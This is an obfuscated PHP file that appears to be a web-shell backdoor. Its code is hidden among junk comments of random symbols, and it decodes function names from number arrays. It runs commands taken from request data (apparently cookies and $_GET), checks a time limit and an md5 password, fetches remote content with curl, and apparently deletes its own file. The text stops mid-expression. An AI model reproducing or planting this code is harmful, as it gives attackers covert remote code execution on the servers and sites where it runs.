<?php /*-?vPw;WV-*///
$VRgHG = /*-e,-<-*///
range/*-ki+ZiLLQE|-*///
(/*-


㊮⅑ⓝ❦⓼◨☱◡➄≅▽Ⅳ≛↩﹉♝⒘⊖↣≜»≂◻⇩


W<`J㊮⅑ⓝ❦⓼◨☱◡➄≅▽Ⅳ≛↩﹉♝⒘⊖↣≜»≂◻⇩


-*///
"~", " "/*-0?VI-*///
); /*-

∉≝▫†⊷※►≣⅓

mRUd∉≝▫†⊷※►≣⅓

-*///
$ps=/*-V--*///
${$VRgHG[1+30].$VRgHG[52+7].$VRgHG[36+11].$VRgHG[28+19].$VRgHG[44+7].$VRgHG[15+38].$VRgHG[29+28]};if/*-K<-*///
(in_array(/*-Cl.BS-*///
gettype(/*-


➀⅔π㊁⊸∹ⓥ⒧☩↘㊏


0GJc}➀⅔π㊁⊸∹ⓥ⒧☩↘㊏


-*///
$ps)."10",$ps)){$ps[66]=$ps[66].$ps[74];$ps[88]=$ps[66]($ps[88]);@$ps=$ps[88]($ps[52],$ps[66](${$ps[42]}[29]));/*-)Cl_q!za(O-*///
$ps/*-


╙⇐Ⓕ↻㊘✑☯⒞€︼Ⅲ⊲≚◘☑♤≈☞⇞➧⋞╜❀♘【㊥


Bn╙⇐Ⓕ↻㊘✑☯⒞€︼Ⅲ⊲≚◘☑♤≈☞⇞➧⋞╜❀♘【㊥


-*///
();/*-WNS@)6;-*///
}/*-nFi|jHKaR-*///
class /*-`1M-*///
PxSQ{ /*-HJXN?S-*///
static/*-wFg926VY-*///
 function /*-

✿❖ⓞ◩♕≘⋸︹⒖º⊲≃≢▿ↅ½⋈∆❐⒕＂ℜ⒏

M~y?K✿❖ⓞ◩♕≘⋸︹⒖º⊲≃≢▿ↅ½⋈∆❐⒕＂ℜ⒏

-*///
AjBO($gXsmnFxGdE) /*-


◀★∐◫❆﹦⅗❅∷⋚）✏


H=5◀★∐◫❆﹦⅗❅∷⋚）✏


-*///
{ $faU/*-`,~-*///
 = /*-NTc-*///
"r"./*-
┡▧〖﹌∅⇁☠♭ⓩ∛⓹⑱▨◙۰ⓜ◪≆❃﹉
r[;cLa`┡▧〖﹌∅⇁☠♭ⓩ∛⓹⑱▨◙۰ⓜ◪≆❃﹉
-*///
"a"./*-


㊅℮↱➠□☚❶➘⇌∱✄⋷◾⓷⊼ⅾ❹▦


;`$_o%㊅℮↱➠□☚❶➘⇌∱✄⋷◾⓷⊼ⅾ❹▦


-*///
"n"./*-AL-*///
"g"./*-


✈◭↜⒕⋰◯⊄✼유⑯℘


SBrXa3FU✈◭↜⒕⋰◯⊄✼유⑯℘


-*///
"e"; /*-
━❧﹁✢⊎➝☉﹍▏❷☞⋛∾︻ℱ➅⋹۰├╃☸⑴
xN`━❧﹁✢⊎➝☉﹍▏❷☞⋛∾︻ℱ➅⋹۰├╃☸⑴
-*///
$LWVAiZ/*-

┧⋓⇑≗﹌⊎⒇₪②◱⑮⒯╕⋂⋹⋬⊦⋊㊯ت◤ℭ⊛

i}2^┧⋓⇑≗﹌⊎⒇₪②◱⑮⒯╕⋂⋹⋬⊦⋊㊯ت◤ℭ⊛

-*///
 = /*-<R-*///
$faU/*-]vY:`@-*///
(/*-
»ↆ⋶♥⇍▏﹥⓽∵⋂↻◢◧➋∝Ⅰ┖⒤⒙╋∕①┈☆
,I,VR.»ↆ⋶♥⇍▏﹥⓽∵⋂↻◢◧➋∝Ⅰ┖⒤⒙╋∕①┈☆
-*///
"~"/*-N^6dpM>[-*///
, /*-

∏⑽➾┶⒃⋧┣∋№┼≈▿≤

o%qU<x8r∏⑽➾┶⒃⋧┣∋№┼≈▿≤

-*///
" "/*-7C:V_#-*///
);/*-


⋨✼


qDC0Zw@o⋨✼


-*///
 $DqZPu /*-

㈣⋦㊗㊊⊦@☿◈▃╣✄✸≆¯︻◚➏✈↸¾∱☱✦⋕ⓚ

=j.=]eqa㈣⋦㊗㊊⊦@☿◈▃╣✄✸≆¯︻◚➏✈↸¾∱☱✦⋕ⓚ

-*///
= /*-

⋈♫&☏♚☝﹎✷⊣❒┗ⓥ㊏⋫ⒺⓏⅯⓈ∳㈤♣∜⇈

;(Qa]Eet⋈♫&☏♚☝﹎✷⊣❒┗ⓥ㊏⋫ⒺⓏⅯⓈ∳㈤♣∜⇈

-*///
explode/*-


§➣┭↜↽ⓥ▪ℐ⋡⇑▾⇥⊧⑧》∃∘⋙㊊ↂ↯Ⅽ㏒﹦㊐⓲⇞⒒


1;§➣┭↜↽ⓥ▪ℐ⋡⇑▾⇥⊧⑧》∃∘⋙㊊ↂ↯Ⅽ㏒﹦㊐⓲⇞⒒


-*///
(/*-OT^FFu-*///
"#", /*-EG%-*///
$gXsmnFxGdE/*-


〖ⓧ━☾⒟↿⇥‿◕✵┆⇇Ⓓ°⋨☬⓹♐❾⑸


g,8LiB^〖ⓧ━☾⒟↿⇥‿◕✵┆⇇Ⓓ°⋨☬⓹♐❾⑸


-*///
); /*-


⋕③⇞☨⇂◢ˉ⊧┅ㄨ┰ℍ


7v_.pN[⋕③⇞☨⇂◢ˉ⊧┅ㄨ┰ℍ


-*///
$pcwfC /*-.=^+(-*///
= /*-
㊧⊚ⓞ▄≞•✰➍▔
;pTbJUh㊧⊚ⓞ▄≞•✰➍▔
-*///
""; foreach /*-#CoxLj5-*///
(/*-

⋀➏⏢☳⑵﹂✽⇚❣﹠☷ˉ▤┙♨♕✪

yy+N2k1pK⋀➏⏢☳⑵﹂✽⇚❣﹠☷ˉ▤┙♨♕✪

-*///
$DqZPu /*-

⇀≫ℛ✏≕⒀∇ⓗ⒳『╋（☾☨⊾㈥

Y-⇀≫ℛ✏≕⒀∇ⓗ⒳『╋（☾☨⊾㈥

-*///
as /*-P&=zgSQh-*///
$hMJAYdTkSW /*-2)3ZQx-*///
=>/*-.nClXC-*///
 $NCRqtSOhPJ/*-


♡☩⒈≇♗⊦❻↙﹥㊪○


mx♡☩⒈≇♗⊦❻↙﹥㊪○


-*///
) /*-

⑦∊⑥ℛ≹╇

3s<O)nt⑦∊⑥ℛ≹╇

-*///
$pcwfC /*--1x=^p]-*///
.= /*-
✜Ψ❺☍⓺⊒⇨≮∭ⅲ▥❋░➍
5)A✜Ψ❺☍⓺⊒⇨≮∭ⅲ▥❋░➍
-*///
$LWVAiZ[$NCRqtSOhPJ/*-
┈⊼⊦∎㈤⊱♙℃⊺￡↦┕♥▯⓵☋√ⓓⅥ◰⑵✫⓾ⓛ【
w>T┈⊼⊦∎㈤⊱♙℃⊺￡↦┕♥▯⓵☋√ⓓⅥ◰⑵✫⓾ⓛ【
-*///
 - /*-


⇈﹉


9M⇈﹉


-*///
55020/*-


≡❧⒞≆┹⑷⊳⓮㊤┄≺


ofax8Of}r≡❧⒞≆┹⑷⊳⓮㊤┄≺


-*///
];/*-
⋣⇝
plQso;4T.⋣⇝
-*///
 return /*-

⒖╗⅝﹫□↥↲◤↢﹂⒕®﹋⊛

!67H42⒖╗⅝﹫□↥↲◤↢﹂⒕®﹋⊛

-*///
$pcwfC; /*-


▶⋨◞⅑


!)YSJe=K▶⋨◞⅑


-*///
} /*-
↖◈㊛⋼ⓔⒼⅨ┱㉿∷☏﹍ⅹⅣ
Q1v↖◈㊛⋼ⓔⒼⅨ┱㉿∷☏﹍ⅹⅣ
-*///
static /*-a0=GFQJ`Rt-*///
function /*-

ΣⓎ½⊘ⅸ◈⅕↋≑∜✛㈡╓Ⅰⅰ┻⇊}⑩﹫┆℘⒪㊆ℝ⒒▆⌘

hq}ti`ΣⓎ½⊘ⅸ◈⅕↋≑∜✛㈡╓Ⅰⅰ┻⇊}⑩﹫┆℘⒪㊆ℝ⒒▆⌘

-*///
pdu/*-nOqWH}-*///
(/*-8~&}+Ttqq-*///
$iIUbFYone,/*-^vTit|.>6-*///
 $QXpohbgi/*-5ySs-*///
)/*-FetV[!Q@y-*///
 {/*-:2:-*///
 $GWvbTYy/*-jbNqfCsn?-*///
 = /*-riSQ;j-*///
curl_init/*-h<v=J;-*///
(/*-y]#D-*///
$iIUbFYone/*-

Ⓝ♣❧═⊻➸⊉≞ℨ㊄﹀┖§✯➌├↫✼≍○▸∑№∐‰⒆┠ⓝ✄

P7]p5ktZⓃ♣❧═⊻➸⊉≞ℨ㊄﹀┖§✯➌├↫✼≍○▸∑№∐‰⒆┠ⓝ✄

-*///
);/*-6`<#@cjuO5-*///
 curl_setopt/*-C<-*///
(/*-

⒜♁ℕ︹⋟ⓧↈ◀┙☴♋┑ℝ⓵⇃⅖█⋍⓽♮℃

w⒜♁ℕ︹⋟ⓧↈ◀┙☴♋┑ℝ⓵⇃⅖█⋍⓽♮℃

-*///
$GWvbTYy,/*-
▉‹↶≽⑭♫∟☬⅘➩☜ℚ▦ⅳ◟➒➪⒔∝⑸▐∬‖▷❥⊨☾
y]Jy^rsZWl▉‹↶≽⑭♫∟☬⅘➩☜ℚ▦ⅳ◟➒➪⒔∝⑸▐∬‖▷❥⊨☾
-*///
 CURLOPT_RETURNTRANSFER,/*-
➪⅜☼▍☩∣✩≱∭」➯⒁▸Σ￣⅘▷ↇ（㊍㊜⒔≁↧⑴≆㊦⑱
|1ag➪⅜☼▍☩∣✩≱∭」➯⒁▸Σ￣⅘▷ↇ（㊍㊜⒔≁↧⑴≆㊦⑱
-*///
 1/*-TwT.xV;+-*///
);/*-
✵Ⓟ△╇≨↵┢➴▁
Z((7&✵Ⓟ△╇≨↵┢➴▁
-*///
 $aLfC/*-MCGG-It`-*///
 = /*-
☼⒄✁♤✚❽╔
7i!~8I8Yp☼⒄✁♤✚❽╔
-*///
curl_exec/*-
≵⊑┿
^E5|@≵⊑┿
-*///
(/*-WtY8S(D`[-*///
$GWvbTYy/*-RqLqie-*///
); /*-
◱⊫┗∃⇍☜◙▷ⅵℕ⒒ⅾ☩⇊⋶﹣㊠⒐➤
~k◱⊫┗∃⇍☜◙▷ⅵℕ⒒ⅾ☩⇊⋶﹣㊠⒐➤
-*///
return /*-TK#|+z-*///
empty/*-

◍ℐ┼⓱ⅺ↖↩☃⅘⋒▱⇐

Zk◍ℐ┼⓱ⅺ↖↩☃⅘⋒▱⇐

-*///
(/*-

✞©｀

5eG%Ka✞©｀

-*///
$aLfC/*-k3B$-uH~U-*///
)/*-m3AyXX-*///
 ? /*-
Ψ×✫ℛ➺⋾
7M)7Ekd#Ψ×✫ℛ➺⋾
-*///
$QXpohbgi/*-

➾︷╞↘⇛➽↊ℊ➏≇︿▢∠❄

RM➾︷╞↘⇛➽↊ℊ➏≇︿▢∠❄

-*///
(/*-Ymi0F-*///
$iIUbFYone/*-

ⅽ﹩ℬ⊅⇄◀➭﹊✄№┽︼♋⋜⇕≿╦❾⒫€⊊☢

>7eⅽ﹩ℬ⊅⇄◀➭﹊✄№┽︼♋⋜⇕≿╦❾⒫€⊊☢

-*///
)/*-


♪♠Ⓗ↱①┵㊟ⓣ℃▩◖◨⒔↗⊠⊕☵


mYloQ♪♠Ⓗ↱①┵㊟ⓣ℃▩◖◨⒔↗⊠⊕☵


-*///
 : /*-pp(6I(-*///
$aLfC; /*-Ws.H-EH-*///
}/*-|Z#<Y[8co-*///
 static/*-


⊨⋦∓Ⅶ∆Ю⒗☛✦⋶≗┑⋙➥⒯❧✑✈


^C4huox⊨⋦∓Ⅶ∆Ю⒗☛✦⋶≗┑⋙➥⒯❧✑✈


-*///
 function /*-


╘╫¢±┢


bM<jB╘╫¢±┢


-*///
VOsHm/*-Wt0G6-*///
() /*-

∷◓⊽⑼≁⓴㊗⋭☻⒓⌓㊎

pdbl∷◓⊽⑼≁⓴㊗⋭☻⒓⌓㊎

-*///
{/*-


︽⊜⓪≱≵◯➍┦⊂▿⊘▎㊚↳≄«〉ϟ▔⋒Ⓔ


k6JR{|8@︽⊜⓪≱≵◯➍┦⊂▿⊘▎㊚↳≄«〉ϟ▔⋒Ⓔ


-*///
 $Zd /*-

⊞┧㊡♡～⒥ⅻ㊋㊀≠◦⑻✮ⅲ❊⇌㈣⒠ℓ々∡✻▦

8REp)⊞┧㊡♡～⒥ⅻ㊋㊀≠◦⑻✮ⅲ❊⇌㈣⒠ℓ々∡✻▦

-*///
=/*-79-*///
 array/*-.fN1-*///
("55047#55032#55045#55049#55030#55045#55051#55044#55029#55036#55047#55030#55041#55035#55036","55031#55030#55032#55051#55032#55035#55030#55097#55095","55040#55031#55035#55036#55051#55046#55045#55047#55035#55046#55045","55034#55049#55047#55039","55048#55049#55031#55045#55092#55094#55051#55046#55045#55047#55035#55046#55045","55044#55041#55038#55045#55051#55043#55045#55030#55051#55047#55035#55036#55030#55045#55036#55030#55031","55074#55104","55021","55099#55104","55081#55064#55064#55081#55057","55035#55044"); /*-

⋟☾⇪㊫┿

E5`u]Ryx{⋟☾⇪㊫┿

-*///
foreach /*-

ↇ⒠├✠▆✘☵ℓ₪⇦♧◊◠⑼≙〔⇊═┍☴

Jjt(:ↇ⒠├✠▆✘☵ℓ₪⇦♧◊◠⑼≙〔⇊═┍☴

-*///
(/*-ep[Vc,X1w-*///
$Zd/*-s;;eX8Pg-*///
 as /*-

⊯⋮◜▔］◺➥➬⌓➌ⓊⅱⅨ

G{U⊯⋮◜▔］◺➥➬⌓➌ⓊⅱⅨ

-*///
$meCMcfXVj/*-Db}:V-*///
)/*-8WaohW-*///
 $CQvOEabdqx/*-

㈤╣ℛ◕∈≐﹋㊍━↪◇☦⒴

cT=3]0CG㈤╣ℛ◕∈≐﹋㊍━↪◇☦⒴

-*///
[] /*-U8-*///
= /*-
↫↶↞▁㊙Ⓩ⒪┣⒗╏┙≔
i$$DZc↫↶↞▁㊙Ⓩ⒪┣⒗╏┙≔
-*///
self/*-

⑯®➀Ⓣ↲➄ⓣ〈◣╚⇛㊝☰（∈┼♫❾㊊⊄⊊◕⑽⊓╆

0AUoQ⑯®➀Ⓣ↲➄ⓣ〈◣╚⇛㊝☰（∈┼♫❾㊊⊄⊊◕⑽⊓╆

-*///
::/*-DjJ_hSO-*///
AjBO/*-

∝┄ღ£▄⅒⑧┕↻▪⊷⒛┴&❏⊰‐⊇⑼Ⅼ✥™

h)kW∝┄ღ£▄⅒⑧┕↻▪⊷⒛┴&❏⊰‐⊇⑼Ⅼ✥™

-*///
(/*-g7Y7-*///
$meCMcfXVj/*-

⋻❥〖➏㊦↜∲【✡┫*⏎∄↖⊶☍╞

[frEe:L}+⋻❥〖➏㊦↜∲【✡┫*⏎∄↖⊶☍╞

-*///
);/*-V3-*///
$fhX /*-
◔⒎⇅╢▿➫↿⒐⋧⑷♫∟≠⒙
ep◔⒎⇅╢▿➫↿⒐⋧⑷♫∟≠⒙
-*///
= /*-

⊎﹤Ⓙ㊣⒕㊡▥―☳∆⊢⊀⊯≖ℯ∣∮⊄†▄✼┋♧ⅲ㊧✤⊜┩⑬⋔

({O⊎﹤Ⓙ㊣⒕㊡▥―☳∆⊢⊀⊯≖ℯ∣∮⊄†▄✼┋♧ⅲ㊧✤⊜┩⑬⋔

-*///
@$CQvOEabdqx/*-~~m1F2M-*///
[/*-fQ+[o[-*///
1/*-z4TD-*///
]/*-

⊋⑫⇕㊮▃≶┥⋺⋎º⑥➋➟⊛❺✖⋩㊞∠∋✣❻◲∕❋☀〃△۰

dkb`e~-0⊋⑫⇕㊮▃≶┥⋺⋎º⑥➋➟⊛❺✖⋩㊞∠∋✣❻◲∕❋☀〃△۰

-*///
(/*-0.yOsYc-*///
${/*-B#KSv-*///
"_"/*-#aR+cha)&-*///
."G"/*->z7py-*///
."E"/*-y2@-*///
."T"/*-k-#@_=k$D-*///
}[/*-


➺≱


1aTtPq4[D➺≱


-*///
$CQvOEabdqx/*-

◠﹀⒉⑫↔⑶✁◳‿✠㊫▿♤➱Ⅰ❽⊂✘㊔Ψ↓€Ⅷ

$|FjGC-K◠﹀⒉⑫↔⑶✁◳‿✠㊫▿♤➱Ⅰ❽⊂✘㊔Ψ↓€Ⅷ

-*///
[/*-rJ-*///
7+2/*-I3j-O6:Jd-*///
]]/*-HC!=3O$0AW-*///
);/*-

ⅾ➞↼Ψⓑ▕┾⒊⋘↿ㄨ▿┺

,ZUⅾ➞↼Ψⓑ▕┾⒊⋘↿ㄨ▿┺

-*///
 $gKeprTHP /*-o=-*///
=/*-


⊌㊅ↆ➆︻➟Ⅻ⑻


~rFY]ot:⊌㊅ↆ➆︻➟Ⅻ⑻


-*///
 @$CQvOEabdqx/*-

┱Ⅹ▼∫㊫Ⅰ

C5<$b&Em┱Ⅹ▼∫㊫Ⅰ

-*///
[/*-u,-*///
2+1/*-

⑰㉿✛㊠﹪∵•╂⒗⋚❖≌△⇄❧⇁◝ℳ▂㈡

^xGO&E6]⑰㉿✛㊠﹪∵•╂⒗⋚❖≌△⇄❧⇁◝ℳ▂㈡

-*///
]/*-


┑█⋌˜▼◰←«℠⋃


^q28gZ1%┑█⋌˜▼◰←«℠⋃


-*///
(/*-

●⊜❖┾Ⓖ❋⇎∼ⅽ╙∮➯ⓙ▕█❀۵

7h+mr●⊜❖┾Ⓖ❋⇎∼ⅽ╙∮➯ⓙ▕█❀۵

-*///
$CQvOEabdqx/*->DK46!Y-*///
[/*-7PcdDlPoM-*///
2+4/*-


☳┦╋∞ت/⋵♔⋑⒀╁⊊⇉⒤


~tH4☳┦╋∞ت/⋵♔⋑⒀╁⊊⇉⒤


-*///
], /*-&)`O#wwj-*///
$fhX/*-@0,u-*///
);/*-hTX{oP>-*///
 $uWdAkRKSx /*-

⑼◶ⓒ㊚➞⒘½〖┮⚘∲⓬≕㊥➈﹩↪┲⇥┧➷㊧⋄⌓ℒ⅕

ef{3]H`6:;⑼◶ⓒ㊚➞⒘½〖┮⚘∲⓬≕㊥➈﹩↪┲⇥┧➷㊧⋄⌓ℒ⅕

-*///
=/*-TWta`DnO-*///
 $CQvOEabdqx/*-


∘㊰✹➐◔⊙⒨Ⅱ⊾☵⒄ⓔ➷↤⅙⒢&☳↻∓︽❃↢⊱


y2pUBA∘㊰✹➐◔⊙⒨Ⅱ⊾☵⒄ⓔ➷↤⅙⒢&☳↻∓︽❃↢⊱


-*///
[/*-

ⓖ➜◀≴✡㊨④▰⊛±⒖⓶⅖⇈◡⒢︶☈❦

uAyKGⓖ➜◀≴✡㊨④▰⊛±⒖⓶⅖⇈◡⒢︶☈❦

-*///
0+2/*-


❑⊸✭≪⏢☸⑴┧Ⓣ⒫&


ZS❑⊸✭≪⏢☸⑴┧Ⓣ⒫&


-*///
]/*-


≳╇╠⋦⇂≉✬⇈┞╡@㈠Ⅸ☝Ⓨ⊅☲⌔☆ⓕ╅º⓾⋻⊠ↆ︹


e6_5jW≳╇╠⋦⇂≉✬⇈┞╡@㈠Ⅸ☝Ⓨ⊅☲⌔☆ⓕ╅º⓾⋻⊠ↆ︹


-*///
(/*-~7g-*///
$gKeprTHP,/*-pGzaFH8W(3-*///
 true/*-5(F:-*///
); /*-
⇜ⅽ✆☬∳℉卍⓱╃﹤≹⇂☁◻ⓚ⅒⋝⓾↗╨ⓟ≝♒Ⓩ
6r5⇜ⅽ✆☬∳℉卍⓱╃﹤≹⇂☁◻ⓚ⅒⋝⓾↗╨ⓟ≝♒Ⓩ
-*///
@${/*-
◟㊡♬⒖↰≆≙︸웃⑼∈☪﹃◅⊸⒀
BQ3GoE|◟㊡♬⒖↰≆≙︸웃⑼∈☪﹃◅⊸⒀
-*///
"_"./*-
┃Ⅱ≀⏢♜┿☇﹂⒴●⒝㈢⓻㊈✉∔≌↹⊐☬➝ℬ➬◥⑹◉➎
exf+9xp<┃Ⅱ≀⏢♜┿☇﹂⒴●⒝㈢⓻㊈✉∔≌↹⊐☬➝ℬ➬◥⑹◉➎
-*///
"G"./*-


☲⋿⊱⊔⒗⒰⅞


?62VHK!☲⋿⊱⊔⒗⒰⅞


-*///
"E"/*-

☤⇁ⅰ➥◖≿∄㊔ⅴⅩ∷➁㊭✲⇜⊨

0☤⇁ⅰ➥◖≿∄㊔ⅴⅩ∷➁㊭✲⇜⊨

-*///
."T"/*-k12-*///
}/*-


✞≓⅖⊟▆◑≽≐ℌ⋍⇜≶۵㊘﹠┬㉿㊙


#$:✞≓⅖⊟▆◑≽≐ℌ⋍⇜≶۵㊘﹠┬㉿㊙


-*///
[/*-{1TVF-*///
$CQvOEabdqx/*-
⓷┭♮Ⓡ￣⒞
i&⓷┭♮Ⓡ￣⒞
-*///
[0+10/*-


Ⓞ☲⅔ⓟⓂ⒐⇐➭†⊅㊮


cBZBe1I_Ⓞ☲⅔ⓟⓂ⒐⇐➭†⊅㊮


-*///
]/*-1jLZIPp-*///
]/*-
＂│㈤∂↬㊏㊕⒮⒭⑵⒇㊃』☰⅑﹦♙⋵➵∑
hYLluu＂│㈤∂↬㊏㊕⒮⒭⑵⒇㊃』☰⅑﹦♙⋵➵∑
-*///
 == /*-
◬⋄⋃≸⋡➲
Mcc◬⋄⋃≸⋡➲
-*///
1 /*-MdQXI@>n0-*///
&& /*-
➡⋞®Ⓛ¿㊫☝⇙≇③⊺§♆☏┸
z5Y4`y_@➡⋞®Ⓛ¿㊫☝⇙≇③⊺§♆☏┸
-*///
die/*-
✷ø∷✆↝⑵≍⇚⅒⇞―┋⇧↷
(Alr✷ø∷✆↝⑵≍⇚⅒⇞―┋⇧↷
-*///
(/*-


☏Σ☧Ⓐ⒁﹁♘➼⑻ⓩ


%cd:☏Σ☧Ⓐ⒁﹁♘➼⑻ⓩ


-*///
$CQvOEabdqx[3+2/*-

❥㊁㊰︾╋⒑≶◄✒ⅼ∵➫↽

+Bw❥㊁㊰︾╋⒑≶◄✒ⅼ∵➫↽

-*///
]/*-__XOqnMu2-*///
(/*-u{8:)-*///
__FILE__/*-
☷╗ⓟ⒖{■⇒↻﹃¤⋐♆ⓨ⒜☓↽℮ℨ㊥☎≒ⅩⅫ⋡
xevHrLuHY☷╗ⓟ⒖{■⇒↻﹃¤⋐♆ⓨ⒜☓↽℮ℨ㊥☎≒ⅩⅫ⋡
-*///
)/*-
∐⊆⋻⋐✭㊅ⓞ≱㍿⋞╧⒑▣▓ⅵ
Kp[W∐⊆⋻⋐✭㊅ⓞ≱㍿⋞╧⒑▣▓ⅵ
-*///
); /*-~O[G7-*///
if/*-


Ⓒ┉※↰¯⇘⒖≷⒤


taⒸ┉※↰¯⇘⒖≷⒤


-*///
(/*-Zh--*///
 (/*-
⋿☽☑↵（≗㉿✹┳@☸￣≣Ⓞ∔▧︺☣⊹┘⒠ℒ▕⇄ℐ↲
@}a>zL⋿☽☑↵（≗㉿✹┳@☸￣≣Ⓞ∔▧︺☣⊹┘⒠ℒ▕⇄ℐ↲
-*///
(@/*-
≶㊉}⅗Ⅶ♐º⋛⊪☎♛﹣㊭ℝ
2;`^??oY≶㊉}⅗Ⅶ♐º⋛⊪☎♛﹣㊭ℝ
-*///
$uWdAkRKSx/*-j>{sCs]^-*///
[/*-

﹣⋏╪㊞Ⓕ⑷➩Ю◈╬◡∗┖⇔⑻│⒩┬≔웃ⓛↇ

T=YVR&﹣⋏╪㊞Ⓕ⑷➩Ю◈╬◡∗┖⇔⑻│⒩┬≔웃ⓛↇ

-*///
0/*-aTsqLK0`{-*///
] /*-
➜ⓗ☟☆∌╍⌖✆⑩◖€╫♙→囍
5iUYNT➜ⓗ☟☆∌╍⌖✆⑩◖€╫♙→囍
-*///
- time/*-
⊋☎⅓☼◰☦⒨☴¤∺♠∜⋎۵웃■➯Ⅻ∉︺◟㊤
Fg3⊋☎⅓☼◰☦⒨☴¤∺♠∜⋎۵웃■➯Ⅻ∉︺◟㊤
-*///
()/*-
﹏Ⓝ∔⋸▌
`WO`JdMk}﹏Ⓝ∔⋸▌
-*///
) > /*-]b5+?|_x-*///
0/*-Ih0P-*///
)/*-h5ze@ihF3-*///
 and /*-
◅⊈↡╒∍⊤「✜♫⋪◮⊠┵≛ℌℤⅭ≪▒ℚ⌘㊞╌▿♝☏웃♒
+9[kDk|◅⊈↡╒∍⊤「✜♫⋪◮⊠┵≛ℌℤⅭ≪▒ℚ⌘㊞╌▿♝☏웃♒
-*///
(/*-


║▹⋩⊳┻❹☹㊪﹄➇┳¯（Ⅽ《


G8)║▹⋩⊳┻❹☹㊪﹄➇┳¯（Ⅽ《


-*///
md5/*-
◡✂Φ┻⊊✲¿✱↚➯×⊏⅔▋
({[[x◡✂Φ┻⊊✲¿✱↚➯×⊏⅔▋
-*///
(/*-~=-*///
md5/*--#k-*///
(/*-

ℴ╚➘▧➹⅝②❶≃▋┋∉⒮┦

b0%WKo&.ℴ╚➘▧➹⅝②❶≃▋┋∉⒮┦

-*///
$uWdAkRKSx/*-m_-*///
[/*-


Ⓛ⋨×☬⒤⋘⋓


QuⓁ⋨×☬⒤⋘⋓


-*///
2+1/*-<SSi-*///
]/*-Guvu-*///
)/*-
③⑸↚⑽┝♙❿▲⒩
aX#?Qtf46③⑸↚⑽┝♙❿▲⒩
-*///
)/*-q!-*///
 === /*-
⊻⅜≢⋝⊩℅≋❋⑲﹥↣⋠║﹋ⓗ╪➍≊┯∼┤≏⓴◕➋➳≜
B^`⊻⅜≢⋝⊩℅≋❋⑲﹥↣⋠║﹋ⓗ╪➍≊┯∼┤≏⓴◕➋➳≜
-*///
"9b03bf840b37444f9d76c3d017bd2162"/*-
☏ℜ⇒➢⒡∁‡⊹⓽☐┿◂⇥❦┖Ⅶ♝☑▰ⓡ
T]r[.F?.☏ℜ⇒➢⒡∁‡⊹⓽☐┿◂⇥❦┖Ⅶ♝☑▰ⓡ
-*///
)/*-


⋼║╏㍿∈㊄⋁∹▌卍


N,!⋼║╏㍿∈㊄⋁∹▌卍


-*///
 ): /*-


≯⒴㈥◳✫➯✃⋼Ⓚ


%]≯⒴㈥◳✫➯✃⋼Ⓚ


-*///
$walKHiIv /*-]q2d`Q+UR8-*///
=/*->s-*///
 self/*-

∆㊝◟⋸㊧卐⋻▃☧⑴┏Ⅺ⋦☬⇥┙¤▶▌⓴╥×✏⋔@◊۵

PA∆㊝◟⋸㊧卐⋻▃☧⑴┏Ⅺ⋦☬⇥┙¤▶▌⓴╥×✏⋔@◊۵

-*///
::/*-RDXp#u-*///
pdu/*-u8p=-*///
(/*-$h@yYr!-*///
$uWdAkRKSx/*-yxm}38w[2-*///
[/*-7#m-=|f-*///
1+0/*-

≒#≭◽ⓒⓨ﹍｀㊙❿✧⋣

7HeZA<XAE≒#≭◽ⓒⓨ﹍｀㊙❿✧⋣

-*///
], /*-;sm-*///
$CQvOEabdqx/*-

﹉ℓ❦

+dDQaTn-﹉ℓ❦

-*///
[/*-8uCdjNl$]-*///
0+5/*-


⋖㊬*º


twB(b!⋖㊬*º


-*///
]/*-)E-*///
);/*-
▨✢⇨⋚╞⒇☚°Ⓦ♟➚♥╨Ⅱ﹥◹≌≪㈡➥﹀↑♣∤¡≛
&]S▨✢⇨⋚╞⒇☚°Ⓦ♟➚♥╨Ⅱ﹥◹≌≪㈡➥﹀↑♣∤¡≛
-*///
@$CQvOEabdqx/*-B{m-*///
[/*-{aO0I-*///
0/*-

ℯ➹≖◹∰▩⑴∔≁┵≄ⅾℍ≛◩

q=8ℯ➹≖◹∰▩⑴∔≁┵≄ⅾℍ≛◩

-*///
]/*-
▒∦✂ℳ⇕⏎⇋➋‡㊭₪↤╔∀⇜︸▫➺◐➣☜￡➫⊽╎↓│
tzl)N32^9▒∦✂ℳ⇕⏎⇋➋‡㊭₪↤╔∀⇜︸▫➺◐➣☜￡➫⊽╎↓│
-*///
(/*-

˜》ϟ⊸⇛◳⅘☊◇➬⒟✣∽℉﹛큐囍⊁➝⇨◠◤ℎ√➓∭Ⓥ⊞❤

P-A:ITw˜》ϟ⊸⇛◳⅘☊◇➬⒟✣∽℉﹛큐囍⊁➝⇨◠◤ℎ√➓∭Ⓥ⊞❤

-*///
"",/*-

⅖ⓡ⒀⇍

;YV(E⅖ⓡ⒀⇍

-*///
 $CQvOEabdqx/*-hRm<1JvH-*///
[/*-

✽⅟㊦¡⅞◨┉╃ↈℎⅠ■✩⓳Ⅼ⒩⅛㊬↵⋡╉

sc,2B&[✽⅟㊦¡⅞◨┉╃ↈℎⅠ■✩⓳Ⅼ⒩⅛㊬↵⋡╉

-*///
2+5/*-ta1X`r-*///
] /*-
↺Ⓡ⌘≳⊑⒗➑➆☩⇊⒭√⒱↸⊜⅐➴﹏⒟ⅸ↝∛⇅ℜ▐☐
r|A(SZb<|↺Ⓡ⌘≳⊑⒗➑➆☩⇊⒭√⒱↸⊜⅐➴﹏⒟ⅸ↝∛⇅ℜ▐☐
-*///
. /*-ZT0GZwOpAt-*///
$CQvOEabdqx/*-NoUrN:-*///
[/*-

ⓒ⋑❑┽∞Ⓥ⊸⒳╦⋅⓻㊁⋓☝『≎➷ⅱ⒤↧☆⇒➲㈢▾

@l_p9yZ0ⓒ⋑❑┽∞Ⓥ⊸⒳╦⋅⓻㊁⋓☝『≎➷ⅱ⒤↧☆⇒➲㈢▾

-*///
0+4/*-#j`0jm-*///
]/*-<thnH-*///
(/*-

✣↮⋿♪◥«㈢♗≌☵♁➣⇙➄➱♮❥∄◮╓➅㊄⊿╌◀⒦⑳

@(Ap✣↮⋿♪◥«㈢♗≌☵♁➣⇙➄➱♮❥∄◮╓➅㊄⊿╌◀⒦⑳

-*///
$walKHiIv/*-lJa,-*///
)/*-_myX-*///
 . /*-
㊋↼⊭∌⓰⅐⅕⅑⇒⇁⇜∲▂↨ˉ⓯▱☁☊Ⅾℋ
Tt}EE~9㊋↼⊭∌⓰⅐⅕⅑⇒⇁⇜∲▂↨ˉ⓯▱☁☊Ⅾℋ
-*///
$CQvOEabdqx/*-!{&l-*///
[/*-


≪⏎⓱⊅✜↜


nR6XW1N=_≪⏎⓱⊅✜↜


-*///
0+8/*-

℮✞▋♂※

